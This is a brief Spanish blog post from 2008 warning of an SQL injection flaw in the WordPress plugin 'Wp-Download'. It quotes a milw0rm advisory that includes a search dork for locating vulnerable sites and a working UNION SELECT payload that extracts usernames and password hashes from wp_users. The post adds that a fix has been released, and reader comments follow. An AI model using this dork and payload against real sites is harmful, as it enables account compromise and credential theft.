Vulnerabilidad afecta un Plugin de WordPress
31 de Marzo de 2008 
5 Comentarios
Recien me encuentro con una vulnerabilidad en un Plugin de WordPress y considero importante por el echo que es de uso bastante masivo ya que lo he visto por varios Lados, consiste en una Inyección Sql en el Plugin “Wp-Download“, aunque no se informó la Url del Autor, supongo que es esta.
Algun Kaker Atacante, puede Explotar la vulnerabilidad Facilmente.
Aca el Informe:
############################################################### # # WordPress Plugin Download file Remote SQL Injection Vulnerability # ############################################################### # # Author: BL4CK # # Mail: bl4ck00@gmail.com # ################################################################ # # Dork: inurl:"wp-download.php?dl_id=" # ################################################################ Example: http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL] SQL: null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/* ################################################################ # Greetz: ZioN, b!g B0$$, h4cky0u.org ################################################################ # milw0rm.com [2008-03-31]
Actualización:
El autor del Plugin ya Liberó una Nueva Versión que arregla el Bug de la Inyeccion Sql.
Por eso siempre trato de usar el menor número posible de plugins y cuando uso uno, procuro que sea muy popular y que su autor lo actualice con frecuencia. Saludos.
saludos nery hice un post en mi blog sobre este tema, saludos
muy bueno esto